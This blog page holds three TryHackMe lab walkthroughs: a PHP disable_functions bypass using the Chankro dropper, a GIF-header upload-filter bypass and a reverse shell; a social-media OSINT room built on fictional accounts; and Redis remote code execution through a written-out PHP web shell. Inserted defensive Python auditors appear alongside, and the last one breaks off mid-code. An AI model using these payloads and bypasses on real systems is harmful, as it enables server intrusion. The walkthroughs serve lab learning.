  • TryHackMe Bypass Disable Functions walkthrough

    Bypass Disable Functions

    Practice bypassing disabled dangerous features that run operating system commands or start processes.

    This vulnerability occurs in web applications that allow a file to be uploaded without any check that curbs its potential dangers.

    It allows an attacker to upload files containing code (scripts such as .php, .aspx and others) and run them on the same server; more information is in this room.


    Among the typically applied measures is disabling dangerous functions that could execute operating system commands or start processes. Functions such as system() or shell_exec() are often disabled through the disable_functions directive in the php.ini configuration file. Other, less well-known functions such as dl() (which loads a PHP extension dynamically) can go unnoticed by the system administrator and remain enabled. The usual thing in an intrusion test is to list which functions are enabled in case any have been forgotten.

    One of the easiest techniques to implement, and one that is not widely known, is to abuse the mail() and putenv() functions. This technique is not new: it was reported to PHP in 2008 by gat3way, but it still works to this day. Through the putenv() function we can modify environment variables, which lets us assign any value we want to LD_PRELOAD. Roughly speaking, LD_PRELOAD makes the dynamic loader load a .so library before the rest of the libraries, so that if a program calls a function from a library (libc.so, for example), it executes the version in our library instead of the original. In this way we can hijack or "hook" functions, modifying their behaviour at will.



    Chankro: tool to evade disable_functions and open_basedir


    Through Chankro we generate a PHP script that acts as a dropper: it creates on the server a .so library and the binary (a meterpreter, for example) or bash script (a reverse shell, for example) that we want to execute, and then calls putenv() and mail() to launch the process.




    Install tool:


    git clone https://github.com/TarlogicSecurity/Chankro.git
    cd Chankro
    python2 chankro.py --help



    python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html

    --arch = Architecture of the victim system: 32 or 64.
    --input = File with the payload to execute.
    --output = Name of the PHP file to create; this is the file you will need to upload.
    --path = Absolute path where the uploaded PHP file will be located on the server. For example, if the file is located in the uploads folder: DOCUMENTROOT + uploads.




     


     

    Now, when executing the PHP script in the web server, the necessary files will be created to execute our payload.

     




     

    My command ran successfully, and I created a file in the directory with the output of the command.

     

    First of all, we start the machine of the TryHackMe room Bypass Disable Functions and browse to the room's IP. There is an upload page where we can upload an image; we will upload our PHP file through Burp Suite, because the upload filter has to be bypassed.

     

     




     

    After uploading the malicious file we have to find out which directory it was uploaded to, so we use gobuster to find the directory.

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
    └─$ gobuster dir -u http://10.10.61.162/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php
    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://10.10.61.162/
    [+] Method:                  GET
    [+] Threads:                 100
    [+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.1.0
    [+] Extensions:              php
    [+] Timeout:                 10s
    ===============================================================
    2021/09/16 12:23:04 Starting gobuster in directory enumeration mode
    ===============================================================
    /uploads              (Status: 301) [Size: 314] [--> http://10.10.61.162/uploads/]
    /assets               (Status: 301) [Size: 313] [--> http://10.10.61.162/assets/] 
    /cv.php               (Status: 200) [Size: 4153]                                  
    Progress: 98580 / 441122 (22.35%) 
    
    
    

     

     

    If you want to check which ports are open on this host, you can do so with Nmap or RustScan.



     

     

      ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
    └─$ rustscan -a 10.10.61.162 --ulimit 5000 -- -A -oN rustscan.txt                                                                 1 ⨯
    [~] Automatically increasing ulimit value to 5000.
    Open 10.10.61.162:22
    Open 10.10.61.162:80
    [~] Starting Nmap
    [>] The Nmap command to be run is nmap -A -oN rustscan.txt -vvv -p 22,80 10.10.61.162
    
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 12:17 IST
    NSE: Loaded 153 scripts for scanning.
    NSE: Script Pre-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    Initiating Ping Scan at 12:17
    Scanning 10.10.61.162 [2 ports]
    Completed Ping Scan at 12:17, 0.24s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 12:17
    Completed Parallel DNS resolution of 1 host. at 12:17, 0.07s elapsed
    DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
    Initiating Connect Scan at 12:17
    Scanning 10.10.61.162 [2 ports]
    Discovered open port 22/tcp on 10.10.61.162
    Discovered open port 80/tcp on 10.10.61.162
    Completed Connect Scan at 12:17, 0.23s elapsed (2 total ports)
    Initiating Service scan at 12:17
    Scanning 2 services on 10.10.61.162
    Completed Service scan at 12:17, 6.50s elapsed (2 services on 1 host)
    NSE: Script scanning 10.10.61.162.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 9.83s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 1.21s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    Nmap scan report for 10.10.61.162
    Host is up, received syn-ack (0.24s latency).
    Scanned at 2021-09-16 12:17:30 IST for 18s
    
    PORT   STATE SERVICE REASON  VERSION
    22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 1f:97:54:30:24:74:f2:fa:15:ed:f3:35:84:dc:6c:d0 (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCimETxFw3xwql560SXGeR88EX/FNiDVNYE4k7xBkwrl7+5YctrnqdNtGrZO2Ki3Zav9TlGBjtRcQ2GOadDlKpLXasXzkiv3nl58+d/VNlhFvaQP1zK5w0f+31KrZnH9EfL9oEv1UZ6UCmJM1O4uvcxYoUOfj0HQJ/27bMGwPETSnWyxVkaBpY34vukFqrlL9HoPTQATrcmxwFSnDh0yn7tSHdNMa8vIlD4lek0q9NG10tBThCTDyXgLnE3++fkutFMSQZ/6EA1tnRFcFK+YgMCRqxTrfr0nQr5JZykseVNO+gpcUY1NDVUlCdMV0xK+WTlukJoRIyfm68P/BZmkyBT
    |   256 a7:21:78:6d:a6:05:7e:5a:0f:7e:53:65:0a:c4:53:49 (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBEb8bpOpxmuRcQAiMJGyKijMw+otZD9IxXMkjgL6k2HJCA1bvpPqk7rxHbDexKDvY3MgNPAx50Mp6tttsOaVXQ=
    |   256 57:1c:22:ac:59:69:62:cb:94:bd:e9:9f:67:68:23:c9 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXfZcsCOQCeq6/HAIKcCimntv0KNHPvqXbsDiXH6WaD
    80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Ecorp - Jobs
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    NSE: Script Post-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 19.37 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
    └─$ 
      

     

     

    We found the upload directory: /uploads

     

     

     


     

     

     

    Fingerprinting the site with Wappalyzer shows that it is written in PHP.

     

     


     

     

    With this in mind, we can see that the file phpinfo.php is available; it gives us information about the server configuration and the settings of the PHP interpreter.

     

     


     

     

    Looking at the information phpinfo gives us, we can see a section called disable_functions, and in it many critical functions are listed, such as:



        exec
        passthru
        shell_exec
        system
        proc_open
        popen
        curl_exec
        curl_multi_exec

     

    As we can see, we are very limited when it comes to uploading a PHP file containing malicious code, but by investigating, and thanks to the information provided by this machine, we can make use of the tool Chankro.

    This tool allows us to execute commands through the mail() and putenv() functions by changing an environment variable, so that the sendmail binary executes our code. A low-level explanation of what it does is given in this article.

    To test whether the tool works, we are going to execute whoami and write its output to the absolute path of the web root, which is /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/; we know this because phpinfo shows the path where the web is hosted.
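    The gap this walkthrough relies on (process spawners disabled, putenv()/mail()/dl() still callable, as explained in the LD_PRELOAD section above) can be checked from the defender's side. The following script is an added example, not part of the room or of Chankro: it parses a php.ini disable_functions line (the sample value is the list seen in this room's phpinfo), reports which process-spawning and indirect-execution functions are still enabled, and prints a hardened directive. The function lists and the php.ini excerpt are constructed for this example.

```python
# Added example (not from the TryHackMe room or the Chankro project):
# audit a PHP disable_functions directive for the gap this walkthrough
# abuses, i.e. process spawners are blocked but putenv()/mail()/dl() are not.
import re

# Functions that directly spawn a process or run a shell command.
PROCESS_SPAWNERS = {
    "exec", "passthru", "shell_exec", "system",
    "proc_open", "popen", "pcntl_exec",
}
# Functions that do not spawn a shell themselves but give the
# LD_PRELOAD / sendmail primitive, or load native code into the interpreter.
INDIRECT_EXEC = {
    "putenv",        # lets a script set LD_PRELOAD for the next child process
    "mail",          # forks the sendmail binary, which honours LD_PRELOAD
    "mb_send_mail",  # same sendmail code path as mail()
    "dl",            # loads an arbitrary PHP extension (.so) at runtime
}

# Constructed sample: the disable_functions value observed in the phpinfo
# page of this room, written as it would appear in php.ini.
SAMPLE_PHP_INI = """
; php.ini excerpt (constructed for this example)
expose_php = Off
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec
"""


def parse_disable_functions(php_ini_text):
    """Return the set of function names listed in disable_functions.

    Handles the directive being absent, empty, or written with arbitrary
    whitespace around the commas; names are lower-cased because PHP
    function names are case-insensitive.
    """
    disabled = set()
    for line in php_ini_text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue  # comments and blanks
        m = re.match(r"disable_functions\s*=\s*(.*)$", line, re.IGNORECASE)
        if not m:
            continue
        value = m.group(1).strip().strip('"')
        disabled |= {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def audit_disable_functions(disabled):
    """Compare a disable_functions set against the two function classes.

    Returns the spawners still enabled, the indirect primitives still
    enabled, and whether the putenv()+mail() chain is still viable.
    """
    enabled_spawners = sorted(PROCESS_SPAWNERS - disabled)
    enabled_indirect = sorted(INDIRECT_EXEC - disabled)
    # The chain in this walkthrough needs putenv() plus a sendmail caller.
    chain_open = "putenv" in enabled_indirect and (
        "mail" in enabled_indirect or "mb_send_mail" in enabled_indirect
    )
    return {
        "enabled_spawners": enabled_spawners,
        "enabled_indirect": enabled_indirect,
        "ld_preload_chain_open": chain_open,
    }


def hardened_directive(disabled):
    """Build a disable_functions line that closes the audited gaps.

    Existing entries (e.g. curl_exec) are kept; only missing names are added.
    """
    wanted = disabled | PROCESS_SPAWNERS | INDIRECT_EXEC
    return "disable_functions = " + ",".join(sorted(wanted))


if __name__ == "__main__":
    current = parse_disable_functions(SAMPLE_PHP_INI)
    for key, value in audit_disable_functions(current).items():
        print("%s: %s" % (key, value))
    print(hardened_directive(current))
```

Run against the room's list it flags pcntl_exec as an enabled spawner and dl, mail, mb_send_mail and putenv as enabled indirect primitives, so the chain is reported open.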


    I will use the tool Chankro with the following parameters, but first we create a c.sh file:

    sudo nano c.sh

     

     





    ┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
    └─$ sudo python chankro.py --arch 64 --input c.sh --output hackingtruth-exploit.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads
    
    
         -=[ Chankro ]=-
        -={ @TheXC3LL }=-
    
    
    [+] Binary file: c.sh
    [+] Architecture: x64
    [+] Final PHP: hackingtruth-exploit.php
    
    
    [+] File created!
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
    └─$     
    

     

    Once Chankro has created the malicious PHP file, I go to the web page and upload it.

     

     

     



     

    At upload time we intercept the request, change the Content-Type to image/jpeg and prepend a GIF87a header.

     

    What is GIF87a?

    GIF87a is the original format for indexed colour images. It uses LZW compression and has the option of being interlaced. GIF89a is the same, but also includes transparency and animation capabilities.
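    As an added example (not from the room or the author), here is the kind of upload check that the Content-Type plus GIF87a trick defeats, next to a hardened validator that decides on a server-side extension allowlist, magic bytes matching that extension, a script-marker scan and a server-generated file name. The file names, the polyglot bytes and the tiny GIF are constructed samples.

```python
# Added example (not code from the room or its author): a naive upload check
# of the kind this walkthrough bypasses, beside a hardened one.
import os
import secrets

# Magic bytes for the image types we allow, keyed by canonical extension.
MAGIC_BY_EXT = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}


def naive_accepts(content_type, data):
    """Weak check: trusts the client's Content-Type plus a magic-byte sniff.

    A PHP file whose body starts with 'GIF87a' and is sent as image/jpeg
    passes this, which is exactly the bypass described above.
    """
    if not content_type.startswith("image/"):
        return False
    return any(data.startswith(m) for magics in MAGIC_BY_EXT.values() for m in magics)


def validate_upload(filename, content_type, data):
    """Hardened check. Returns (accepted, reason_or_safe_name).

    The client-supplied name and Content-Type never decide on their own:
    the extension allowlist, magic bytes matching that extension and a scan
    for script markers decide, and the stored name is server-generated so a
    crafted name cannot reach the PHP interpreter.
    """
    # 1. Exactly one extension, taken from the basename, on the allowlist
    #    ('shell.php' and 'shell.php.gif' are both rejected here).
    base = os.path.basename(filename)
    if base.count(".") != 1:
        return False, "exactly one extension required"
    ext = base.rsplit(".", 1)[1].lower()
    ext = {"jpeg": "jpg"}.get(ext, ext)
    if ext not in MAGIC_BY_EXT:
        return False, "extension .%s not allowed" % ext
    # 2. Magic bytes must match the claimed extension, not just any image.
    if not data.startswith(MAGIC_BY_EXT[ext]):
        return False, "magic bytes do not match extension"
    # 3. Content-Type must agree (a mismatch is a signal, although the
    #    decision never rests on the header alone).
    if content_type != "image/" + ("jpeg" if ext == "jpg" else ext):
        return False, "content-type disagrees with extension"
    # 4. Reject embedded script markers; a real deployment should also
    #    re-encode the image with an image library, which drops trailing data.
    lowered = data.lower()
    if b"<?" in lowered or b"<script" in lowered:
        return False, "script marker inside image body"
    # 5. Server-chosen name with the validated extension.
    return True, "%s.%s" % (secrets.token_hex(16), ext)


# Constructed samples: a polyglot as built in this walkthrough (GIF header in
# front of a PHP body; the PHP is a harmless placeholder) and a 1x1 GIF.
POLYGLOT = b"GIF87a<?php /* constructed placeholder */ ?>"
TINY_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff,"
            b"\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

if __name__ == "__main__":
    print("naive accepts polyglot:", naive_accepts("image/jpeg", POLYGLOT))
    print("hardened:", validate_upload("shell.php", "image/jpeg", POLYGLOT))
    print("hardened:", validate_upload("shell.gif", "image/gif", POLYGLOT))
    print("hardened:", validate_upload("photo.gif", "image/gif", TINY_GIF))
```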

     

     

    Check whether the file was uploaded to the /uploads directory.



     


     

     

     

    Gaining Access 


    Now that we can see that commands can be executed at the system level, I will modify the file command.sh and add code that, when executed, starts a reverse shell to my machine on port 443:


    With this in mind, and with the file command.sh already modified, I recreate the file winsad.php with Chankro; once it is created I add the header 'GIF89a;' and upload the file.

    After uploading the PHP file again and browsing to the path where winsad.php is hosted, I can see that the code is interpreted and gives me the shell:

     

    Start a netcat listener and open the uploaded file:

    nc -nvlp 4444

     





    Once inside the machine we can go to the home directory of the user s4vi and view the flag.



    www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home
    <ml/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home                       
    www-data@ubuntu:/home$ ls -la
    ls -la
    total 12
    drwxr-xr-x  3 root root 4096 Jun 22 08:12 .
    drwxr-xr-x 22 root root 4096 Jun 23 18:59 ..
    drwxr-xr-x  4 s4vi s4vi 4096 Jun 23 23:34 s4vi
    www-data@ubuntu:/home$ cd s4vi
    cd s4vi
    www-data@ubuntu:/home/s4vi$ 
    ls -la
    
    
    
    www-data@ubuntu:/home/s4vi$ ls -la
    total 44
    drwxr-xr-x 4 s4vi s4vi 4096 Jun 23 23:34 .
    drwxr-xr-x 3 root root 4096 Jun 22 08:12 ..
    -rw------- 1 root root 6127 Jun 23 23:49 .bash_history
    -rw-r--r-- 1 s4vi s4vi  220 Jun 22 08:12 .bash_logout
    -rw-r--r-- 1 s4vi s4vi 3771 Jun 22 08:12 .bashrc
    drwx------ 2 s4vi s4vi 4096 Jun 22 09:46 .cache
    drwxrwxr-x 2 s4vi s4vi 4096 Jun 23 23:33 .nano
    -rw-r--r-- 1 s4vi s4vi  655 Jun 22 08:12 .profile
    -rw-r--r-- 1 s4vi s4vi    0 Jun 23 17:59 .sudo_as_admin_successful
    -rw-r--r-- 1 root root  183 Jun 23 23:29 .wget-hsts
    -rw-rw-r-- 1 s4vi s4vi   37 Jun 23 23:34 flag.txt
    www-data@ubuntu:/home/s4vi$ 
    
    
    
    www-data@ubuntu:/home/s4vi$ cat flag.txt
    cat cat flag.txt
    cat: cat: No such file or directory
    thm{bypass_d1sable_functions_1n_php}
    www-data@ubuntu:/home/s4vi$ 
    
    
    
    

     

    We got it!!! 



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



     

  • TryHackMe KaffeeSec - SoMeSINT

     



     



    In this room, you will be learning social media analysis and forensics. You will learn about google dorking, website archiving, social media enumeration/analysis, and the basic usage of OSINT techniques in the context of social media investigation. You don't need any previous knowledge of OSINT to do well in this room, but it definitely helps. I have included some resources in the "Resources" task at the bottom of the room that I encourage you to check out after completing this room!



    Prerequisites:


    Critical Thinking.
    A love of going deep into rabbit-holes.
    Basic understanding of Google.
    Python 3.7+





    Task 2 Story


    Background Information:


    You are Aleks Juulut, a private eye based out of Greenland. You don't usually work digitally, but have recently discovered OSINT techniques to make that aspect of your job much easier. You were recently hired by a mysterious person under the moniker "H" to investigate a suspected cheater, named Thomas Straussman.


    After a brief phone-call with his wife, Francesca Hodgerint, you've learned that he's been acting suspicious lately, but she isn't sure exactly what he could be doing wrong. She wants you to investigate him and report back anything you find. Unfortunately, you're out of the country on a family emergency and cannot get back to Greenland to meet the deadline of the investigation, so you're going to have to do all of it digitally. Good luck! 


    Answer the questions below


    1) Who hired you?

    Ans :- ks{H}


    2) Who are you investigating? (ks{firstname lastname})

    Ans :- ks{thomas straussman}





    Task 3 Let's get started!!


    Prerequisites:

    Patience, curiosity, and a passion for digging into rabbit holes.
    Firefox, Chrome, or another chromium-based browser (I recommend Brave).

    
    How exciting! Through talking to people who know Thomas, you've found out that he has a very guessable online handle: tstraussman. With this handle, we can find his social media accounts.

    
    The overall process for finding information from social media accounts starts with finding the social media accounts themselves. Finding social media accounts from names or emails can be automated through a process called enumeration. This is usually done with CLI tools or scripts, but you can get similar effects with google dorking. Here is a guide on google dorking, it's great reading material before you attempt this task and also includes a cheat-sheet that comes in handy.


    
    Before starting, I will preface this by saying the only places these accounts are found on are Twitter and Reddit. Please do not try to investigate further out-of-scope, as you will both meet a dead end and be snooping on accounts not involved with this CTF at all. I am not responsible for any actions/interactions made with an account outside of the sockpuppets created for this CTF. As a general rule, we're collecting PASSIVE information - there's no interacting directly with these accounts.



    Answer the questions below


    1) What is Thomas' favorite holiday?

    Ans :- Christmas



    It's mentioned in the bio as X-mas or Christmas.





    2) What is Thomas' birth date?

    Ans :- 12-20-1990


    His birthday is evident from the Reddit post below.


     

    3) What is Thomas' fiancee's Twitter handle?

    Ans :- @fhodgelink



     

    Looking at his followers we can find the Twitter handle of his fiancée.
     

     

     

    4) What is Thomas' background picture of?

    Ans :- Buddha







     

     

    Task 4 Spider... what?


    Requirements:

        Spiderfoot
        Python 3


    First things first, make sure that you've downloaded the latest version of Python3. Then follow this guide to install the latest version of Spiderfoot (currently v3.3).






     

    Once it's installed correctly, run it by typing python3 sf.py -l 127.0.0.1:5001

    You can access the web interface by navigating to localhost:5001 in your browser.






    Click on "New Scan". In the "Scan Target" field, type in "Thomas Straussman" or "tstraussman"; then, under By Use Case, ensure that you checked the All option. Finally, press run. 



    Looking at the results, you can figure out which are false positives by filtering out anything that isn't related to Reddit or Twitter. 


    If you find a Twitter account that leads to shadowban.eu, click on the link.

    If you can't find anything related to Twitter, go to Settings --> Account Finder and set the highlighted option to False.








    1) What was the source module used to find these accounts?

    Ans :- sfp_accounts    

     


     

     

     

     

    2) Check the shadowban API. What is the value of "search"?

    Ans :- ks{1346173539712380929}






    Task 5 Connections, connections..

     

    Now that you have Thomas' Reddit and Twitter accounts, you can do some cool stuff!


    At this point, consider downloading a reverse search extension for your browser, my favorite is RevEye, which lets you choose from a handful of great reverse search engines, or use all of them simultaneously. Chrome / Firefox


    There are a few key types of information that we want to find from socials:

    Images of places that contain clear identifiers like buildings, signs, monuments, or landmarks (For IMINT/GEOMINT purposes).



    Clear images of the subject's face (For reverse image searches and possibly finding more accounts/sources of info).

    Clear images of the subject in a group of people (Family photos, friend groups, other information that can give context to their relationship with the group).

    Personal information in their bio, or other personal data from their profile itself (Where they grew up, currently live, went to school, etc..).

    Relevant posts that may contain information on their whereabouts or personal habits (Do they smoke? Drink? Go to bars often? Love to vacation to specific places? All this information can help in an investigation.)


    Since you have gotten most useful information from Thomas' Twitter, it's time to "pivot" to his fiancee's account.

    What personal information can you find?



    NOTE: If you get stuck on the first flag, consider two things:


    • You can reverse image search landscapes / locations and most likely get a result.
    • You can look at the source of the website (ctrl + shift + c, then click on the image) and try to find some metadata from the image.



    Answer the questions below


    1) Where did Thomas and his fiancee vacation to?

    Ans :- Koblenz, Germany

     

     



    Fiancée's Twitter handle is @Fhodgelink (https://twitter.com/FHodgelink).
    It's pretty straightforward as per the picture below.

    The flag format is City, Country (7 letters, 7 letters), so it will be in the format _______, Germany.

    Doing a reverse image search of this picture indicates it's Koblenz in Germany.







     

    2) When is Francesca's Mother's birthday? (without the year)

    Ans :- December 25th

     

     

    We can see it in the tweet above.

     




    3) What is the name of their cat?

    Ans :- Gotank

     

     

    https://twitter.com/FHodgelink/status/1343023195855736837

     

     




    4) What show does Francesca like to watch?

    Ans :- 90 Day Fiancee




    One of the tweets, shown below, shares the name of the programme.



    Task 6 Turn back the clock!!


    Now that we've gathered intel from Thomas' and Francesca's Twitter accounts, let's move to another platform: Reddit.


    For the sake of this investigation, we're going to be using Reddit in two different ways:

    Use the old version (http://old.reddit.com/) for wayback machine purposes

    Use the new version (https://www.reddit.com/) for other purposes (later on)


    First, you're going to want to install the WayBackMachine extension for your browser (you don't need it, but it'll make your life much easier).


        Get it for Firefox
        Get it for Chrome
       

    Using Reddit's old site, navigate to Thomas' profile. Right click anywhere on the page and click on Wayback machine --> All Versions. You will see a calendar that shows all of the saved versions of the site, click through and take a look at each saved version (in this case there should be none).


    So it hasn't been saved yet... Nothing out of the ordinary, right?

    Next, go to Thomas' birthday post. Repeat the steps to find the first version of the site and..... Voila!


    We've discovered a coworker, which is another source of intel for us! But the question is... how much intel?


    Answer the questions below


    1) What is the name of Thomas' coworker?

    Ans :- Hans Minik

     

     


     

     

    I got stuck at this stage. Finally I used the Wayback Machine to check the snapshot for 21st Dec 2020.



     

    2) Where does his coworker live?

    Ans :- Nuuk, Greenland

     

    Thomas lives in Nuuk, as per his profile

     

     




    Looking into Hans' Reddit profile, we can find the following posts.

     


     




    3) What is the paste ID for the link we found? (flag format)

    Ans :- ks{ww4ju}

     

    Hans profile is https://web.archive.org/web/20210104143852/https://old.reddit.com/user/minikhans

     

     

     


     

     




    4) Password for the next link? (flag format)

    Ans :- ks{1qaz2wsx}

     

     


     

     


     




    5) What is the name of Thomas' mistress?

    Ans :- Emilia Moller

     

     




    Paste the password obtained in the step above into the URL and the name will be shown.





     

     




    6) What is Thomas' Email address?

    Ans :- straussmanthom@mail.com









  • TryHackMe Res Redis pentesting Walkthrough

     

     


     

     

     

    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. It's a comfortable way to learn using pre-designed courses which include virtual machines (VMs) hosted in the cloud.


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
      



    Res is a new box on TryHackMe where you have to hack into a vulnerable database server with an in-memory data structure in this semi-guided challenge!


    Let's start off by scanning all ports using Nmap:


     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ sudo nmap -A -T4 -Pn  -sV -p- 10.10.43.113                                          130 ⨯
    [sudo] password for hackerboy: 
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-26 23:32 IST
    Nmap scan report for 10.10.43.113
    Host is up (0.22s latency).
    Not shown: 65533 closed ports
    PORT     STATE SERVICE VERSION
    80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Apache2 Ubuntu Default Page: It works
    6379/tcp open  redis   Redis key-value store 6.0.7
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint: #www.kumaratuljaiswal.in #www.hackingtruth.in
    OS:SCAN(V=7.91%E=4%D=1/26%OT=80%CT=1%CU=44172%PV=Y%DS=2%DC=T%G=Y%TM=60105BB
    OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=8)OPS
    OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
    OS:1NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
    OS:(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
    OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
    OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
    OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)
    
    Network Distance: 2 hops
    
    TRACEROUTE (using port 23/tcp)
    HOP RTT       ADDRESS
    1   224.93 ms 10.8.0.1
    2   225.08 ms 10.10.43.113
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 626.03 seconds
                                                                                                  
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 

    Looking at the results we have an Apache web server running on port 80 and Redis 6.0.7, an in-memory data structure store, running on port 6379.


    Port 80: Apache Web Server:

    Let’s checkout the web server on port 80:

    OK, so we have the standard Apache landing page, and the page source shows nothing hidden. I ran a directory scan with Dirsearch to see whether I could find any hidden directories; unfortunately none were found. Time to move on to port 6379 and enumerate Redis.

     

    Redis is not something I am familiar with so I spent some time Googling and found a good blog on enumerating Redis as below: 

    To start with we need to install redis-tools, which provides the redis-cli client:

    sudo apt-get install redis-tools



    To connect to the target with redis-cli, from the command line we enter:

    redis-cli -h [IP ADDRESS]


    By default Redis can be accessed without credentials, although it can be configured to require a password only, or a username and password. In our case Redis can be accessed without any credentials; we can check this simply by entering the ‘info’ command.

    From the above we can see that we have a potential username: vianka. The HackTricks website shows how we can gain RCE, as follows:

    In Firefox we can navigate to [IP-ADDRESS]/redis.php:

    We can see that redis.php does indeed run phpinfo().

    Let’s try this with another PHP script, one that runs commands:


    <?php system($_GET['cmd']); ?>



    In redis-cli, we can simply overwrite the previous php file with this code and try RCE. 
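As an added defender-side example (not part of this walkthrough), the Python below audits a redis.conf for the settings that make this write-a-dump-into-the-web-root technique possible: no authentication, no bind restriction, protected mode off and an unrestricted CONFIG command. The two sample configs are constructed; the enable-protected-configs note refers to Redis 7, not the 6.0.7 running on this box.

```python
"""Audit a redis.conf for the conditions the walkthrough abused: an instance
reachable without credentials whose CONFIG command can repoint dir/dbfilename."""
import shlex


def parse_redis_conf(text: str) -> dict:
    """Map each directive to every argument vector it appears with ('#' is a comment)."""
    directives: dict = {}
    for raw in text.splitlines():
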